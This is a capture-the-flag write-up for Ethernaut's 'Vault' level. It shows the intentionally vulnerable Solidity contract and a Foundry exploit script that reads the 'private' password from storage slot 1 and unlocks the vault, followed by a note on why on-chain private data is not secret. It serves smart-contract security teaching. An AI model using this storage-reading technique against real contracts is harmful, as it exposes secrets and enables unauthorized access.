Level 8 - Vault ⏺⏺

Level Setup

Unlock the vault to pass the level!

Level Contract

ethernaut/contracts/src/levels/Vault.sol at a89c8f7832258655c09fde16e6602c78e5e99dbd · OpenZeppelin/ethernautGitHub

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Vault {
  bool public locked;
  bytes32 private password;

  constructor(bytes32 _password) {
    locked = true;
    password = _password;
  }

  function unlock(bytes32 _password) public {
    if (password == _password) {
      locked = false;
    }
  }
}

Exploit

Private variable aren't secret, they are just not accessible by other smart contracts directly during smart contract execution. They can be read directly from the storage slots.

Use foundrys vm.load cheatcode to get the data in the slot.

make anvil-exploit-level-8

<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>

ethernaut-foundry/script/Level8.s.sol at main · EridianAlpha/ethernaut-foundryGitHub

script/Level8.s.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;

import {Script, console} from "forge-std/Script.sol";
import {HelperFunctions} from "script/HelperFunctions.s.sol";

interface IVault {
    function unlock(bytes32 _password) external;
}

// ================================================================
// │                          LEVEL 8 - VAULT                     │
// ================================================================
contract Exploit is Script, HelperFunctions {
    function run() public {
        address targetContractAddress = getInstanceAddress();
        IVault targetContract = IVault(targetContractAddress);

        bytes32 password = vm.load(targetContractAddress, bytes32(uint256(1)));
        console.log("Password: %s", bytesToString(password));

        vm.startBroadcast();
        targetContract.unlock(password);
        vm.stopBroadcast();
    }
}

Submit instance... 🥳

Completion Message

It's important to remember that marking a variable as private only prevents other contracts from accessing it. State variables marked as private and local variables are still publicly accessible.

To ensure that data is private, it needs to be encrypted before being put onto the blockchain. In this scenario, the decryption key should never be sent on-chain, as it will then be visible to anyone who looks for it. zk-SNARKs provide a way to determine whether someone possesses a secret parameter, without ever having to reveal the parameter.

Notes

ethernaut-openzeppelin-hacks/level_8_Vault.md at e936301859334383d568a614084917100319205e · nvnx7/ethernaut-openzeppelin-hacksGitHub

Last updated 1 year ago

hashtagLevel Setup

hashtagLevel Contract

hashtagExploit

hashtagCompletion Message

hashtagNotes

Level Setup

Level Contract

Exploit

Completion Message

Notes